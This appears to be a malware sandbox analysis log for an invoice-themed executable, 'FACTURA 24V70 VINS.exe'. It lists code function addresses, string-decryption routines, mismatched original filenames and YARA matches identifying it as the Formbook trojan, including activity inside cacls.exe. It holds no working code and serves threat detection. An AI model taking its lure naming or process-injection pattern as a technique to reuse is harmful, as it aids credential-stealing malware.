Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_00403130	3_2_00403130
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_004101D3	3_2_004101D3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0040E253	3_2_0040E253
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_00401210	3_2_00401210
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_004023B0	3_2_004023B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0042EC13	3_2_0042EC13
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_00402560	3_2_00402560
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0040FFAA	3_2_0040FFAA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0040FFB3	3_2_0040FFB3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C8158	3_2_017C8158
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_018001AA	3_2_018001AA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DA118	3_2_017DA118
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01730100	3_2_01730100
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F81CC	3_2_017F81CC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F41A2	3_2_017F41A2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FA352	3_2_017FA352
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_018003E6	3_2_018003E6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174E3F0	3_2_0174E3F0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C02C0	3_2_017C02C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01800591	3_2_01800591
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740535	3_2_01740535
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F2446	3_2_017F2446
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E4420	3_2_017E4420
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EE4F6	3_2_017EE4F6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740770	3_2_01740770
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01764750	3_2_01764750
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173C7C0	3_2_0173C7C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175C6E0	3_2_0175C6E0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01756962	3_2_01756962
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0180A9A6	3_2_0180A9A6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017429A0	3_2_017429A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174A840	3_2_0174A840
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01742840	3_2_01742840
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176E8F0	3_2_0176E8F0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017268B8	3_2_017268B8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FAB40	3_2_017FAB40
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F6BD7	3_2_017F6BD7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173EA80	3_2_0173EA80
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DCD1F	3_2_017DCD1F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174AD00	3_2_0174AD00
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173ADE0	3_2_0173ADE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01758DBF	3_2_01758DBF
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740C00	3_2_01740C00
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01730CF2	3_2_01730CF2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0CB5	3_2_017E0CB5
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B4F40	3_2_017B4F40
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01760F30	3_2_01760F30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E2F30	3_2_017E2F30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01782F28	3_2_01782F28
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174CFE0	3_2_0174CFE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01732FC8	3_2_01732FC8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017BEFA0	3_2_017BEFA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740E59	3_2_01740E59
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FEE26	3_2_017FEE26
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FEEDB	3_2_017FEEDB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01752E90	3_2_01752E90
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FCE93	3_2_017FCE93
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172F172	3_2_0172F172
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0177516C	3_2_0177516C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174B1B0	3_2_0174B1B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0180B16B	3_2_0180B16B
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F70E9	3_2_017F70E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FF0E0	3_2_017FF0E0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EF0CC	3_2_017EF0CC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017470C0	3_2_017470C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172D34C	3_2_0172D34C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F132D	3_2_017F132D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0178739A	3_2_0178739A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E12ED	3_2_017E12ED
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175B2C0	3_2_0175B2C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017452A0	3_2_017452A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F7571	3_2_017F7571
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DD5B0	3_2_017DD5B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01731460	3_2_01731460
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FF43F	3_2_017FF43F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FF7B0	3_2_017FF7B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01785630	3_2_01785630
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F16CC	3_2_017F16CC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01749950	3_2_01749950
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175B950	3_2_0175B950
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D5910	3_2_017D5910
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AD800	3_2_017AD800
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017438E0	3_2_017438E0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFB76	3_2_017FFB76
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B5BF0	3_2_017B5BF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0177DBF9	3_2_0177DBF9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175FB80	3_2_0175FB80
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B3A6C	3_2_017B3A6C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFA49	3_2_017FFA49
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F7A46	3_2_017F7A46
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EDAC6	3_2_017EDAC6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DDAAC	3_2_017DDAAC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01785AA0	3_2_01785AA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E1AA3	3_2_017E1AA3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F7D73	3_2_017F7D73
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F1D5A	3_2_017F1D5A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01743D40	3_2_01743D40
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175FDC0	3_2_0175FDC0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B9C32	3_2_017B9C32
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFCF2	3_2_017FFCF2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFF09	3_2_017FFF09
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01703FD2	3_2_01703FD2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01703FD5	3_2_01703FD5
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FFFB1	3_2_017FFFB1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01741F92	3_2_01741F92
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01749EB0	3_2_01749EB0
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E47F0	11_2_037E47F0
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_03805200	11_2_03805200
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E4840	11_2_037E4840
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E67C0	11_2_037E67C0
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037ECE4A	11_2_037ECE4A
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037ECE90	11_2_037ECE90
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037ECE8B	11_2_037ECE8B
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E65A0	11_2_037E65A0
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037E6597	11_2_037E6597
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Code function: 11_2_037EECB0	11_2_037EECB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CA352	12_2_037CA352
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371E3F0	12_2_0371E3F0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037D03E6	12_2_037D03E6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B0274	12_2_037B0274
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037902C0	12_2_037902C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03798158	12_2_03798158
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037AA118	12_2_037AA118
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03700100	12_2_03700100
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C81CC	12_2_037C81CC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037D01AA	12_2_037D01AA
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C41A2	12_2_037C41A2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037A2000	12_2_037A2000
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03710770	12_2_03710770
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03734750	12_2_03734750
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0370C7C0	12_2_0370C7C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372C6E0	12_2_0372C6E0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03710535	12_2_03710535
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037D0591	12_2_037D0591
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C2446	12_2_037C2446
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B4420	12_2_037B4420
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037BE4F6	12_2_037BE4F6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CAB40	12_2_037CAB40
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C6BD7	12_2_037C6BD7
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0370EA80	12_2_0370EA80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03726962	12_2_03726962
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037129A0	12_2_037129A0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037DA9A6	12_2_037DA9A6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371A840	12_2_0371A840
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03712840	12_2_03712840
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0373E8F0	12_2_0373E8F0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_036F68B8	12_2_036F68B8
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03784F40	12_2_03784F40
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03730F30	12_2_03730F30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B2F30	12_2_037B2F30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03752F28	12_2_03752F28
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371CFE0	12_2_0371CFE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03702FC8	12_2_03702FC8
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0378EFA0	12_2_0378EFA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03710E59	12_2_03710E59
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CEE26	12_2_037CEE26
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CEEDB	12_2_037CEEDB
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03722E90	12_2_03722E90
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CCE93	12_2_037CCE93
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037ACD1F	12_2_037ACD1F
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371AD00	12_2_0371AD00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0370ADE0	12_2_0370ADE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03728DBF	12_2_03728DBF
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03710C00	12_2_03710C00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03700CF2	12_2_03700CF2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B0CB5	12_2_037B0CB5
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_036FD34C	12_2_036FD34C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C132D	12_2_037C132D
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0375739A	12_2_0375739A
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B12ED	12_2_037B12ED
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372B2C0	12_2_0372B2C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037152A0	12_2_037152A0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037DB16B	12_2_037DB16B
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0374516C	12_2_0374516C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_036FF172	12_2_036FF172
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0371B1B0	12_2_0371B1B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C70E9	12_2_037C70E9
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CF0E0	12_2_037CF0E0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037170C0	12_2_037170C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037BF0CC	12_2_037BF0CC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CF7B0	12_2_037CF7B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03755630	12_2_03755630
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C16CC	12_2_037C16CC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C7571	12_2_037C7571
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037D95C3	12_2_037D95C3
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037AD5B0	12_2_037AD5B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03701460	12_2_03701460
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CF43F	12_2_037CF43F
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFB76	12_2_037CFB76
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03785BF0	12_2_03785BF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0374DBF9	12_2_0374DBF9
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372FB80	12_2_0372FB80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03783A6C	12_2_03783A6C
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFA49	12_2_037CFA49
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C7A46	12_2_037C7A46
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037BDAC6	12_2_037BDAC6
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03755AA0	12_2_03755AA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037ADAAC	12_2_037ADAAC
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037B1AA3	12_2_037B1AA3
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03719950	12_2_03719950
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372B950	12_2_0372B950
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037A5910	12_2_037A5910
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0377D800	12_2_0377D800
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037138E0	12_2_037138E0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFF09	12_2_037CFF09
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFFB1	12_2_037CFFB1
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03711F92	12_2_03711F92
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03719EB0	12_2_03719EB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C7D73	12_2_037C7D73
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037C1D5A	12_2_037C1D5A
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03713D40	12_2_03713D40
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_0372FDC0	12_2_0372FDC0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03789C32	12_2_03789C32
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037CFCF2	12_2_037CFCF2
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA1C60	12_2_02DA1C60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02D9CBD7	12_2_02D9CBD7
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02D9CBE0	12_2_02D9CBE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02D9AE80	12_2_02D9AE80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02D9CE00	12_2_02D9CE00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA52F0	12_2_02DA52F0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA34D0	12_2_02DA34D0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA34CB	12_2_02DA34CB
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DA348A	12_2_02DA348A
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DBB840	12_2_02DBB840
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2E347	12_2_03A2E347
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2E7FD	12_2_03A2E7FD
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2E463	12_2_03A2E463
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2CB13	12_2_03A2CB13
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03A2D868	12_2_03A2D868

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 017AEA12 appears 86 times
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 01775130 appears 58 times
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 017BF290 appears 105 times
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 0172B970 appears 280 times
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: String function: 01787E54 appears 111 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 03757E54 appears 111 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 0377EA12 appears 86 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 0378F290 appears 105 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 036FB970 appears 280 times
Source: C:\Windows\SysWOW64\cacls.exe	Code function: String function: 03745130 appears 58 times

Sample file is different than original file name gathered from version info

Source: FACTURA 24V70 VINS.exe, 00000001.00000002.2205462950.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe, 00000001.00000000.2175699690.0000000000DF6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamehbJm.exe6 vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe, 00000001.00000002.2210561438.0000000007D50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe, 00000003.00000002.3037746127.00000000011D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCACLS.EXEj% vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe, 00000003.00000002.3038189203.000000000182D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA 24V70 VINS.exe
Source: FACTURA 24V70 VINS.exe	Binary or memory string: OriginalFilenamehbJm.exe6 vs FACTURA 24V70 VINS.exe

Uses 32bit PE files

Source: FACTURA 24V70 VINS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.FACTURA 24V70 VINS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
